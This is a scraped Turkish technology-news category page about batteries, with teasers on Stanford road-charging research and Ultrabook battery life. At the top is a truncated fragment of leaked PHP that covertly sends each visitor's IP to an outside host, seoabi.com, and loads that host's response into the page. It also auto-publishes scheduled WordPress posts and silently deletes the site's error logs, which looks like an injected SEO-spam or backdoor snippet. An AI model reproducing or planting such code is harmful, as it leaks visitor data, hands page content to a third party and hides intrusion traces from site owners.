$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> batarya | Teknoloji Haberleri

batarya kategorisindeki tüm yazılar

Son Yazılar

Elektrikli araçlar yoldan şarj edilecek

Amerika Birleşik Devletleri’nin Kaliforniya eyaletinde San Fransisko’nun 40 km güneydoğusunda bulunan özel bir üniversite olan Leland Stanford Junior University ya da bilinen adıyla Stanford Üniversitesi elektrik konusunda her geçen gün daha fazla araştırmaya imza atıyor. Üniversite’de kısa süre önce kablosuz enerjiyle çalışan milimetre boyunda kalp cihazı üretilmişti.

Ultrabook’larda Pil Performansı

Tasarım ve hafifliklerinin yanı sıra performanslarıyla da başarılı bir çizgi çizen Ultrabook’ların pil performansları nasıl? Ultrabook’ların pillerine genel bir bakış attık. Masaüstü bilgisayarlar ile dizüstü bilgisayarları birbirinden ayıran en önemli özellik muhtemelen dizüstü bilgisayarların pille çalışıyor olması. Dizüstü bilgisayarlar, taşınabilir oldukları için masaüstülere göre oldukça avantajlı konumdalar.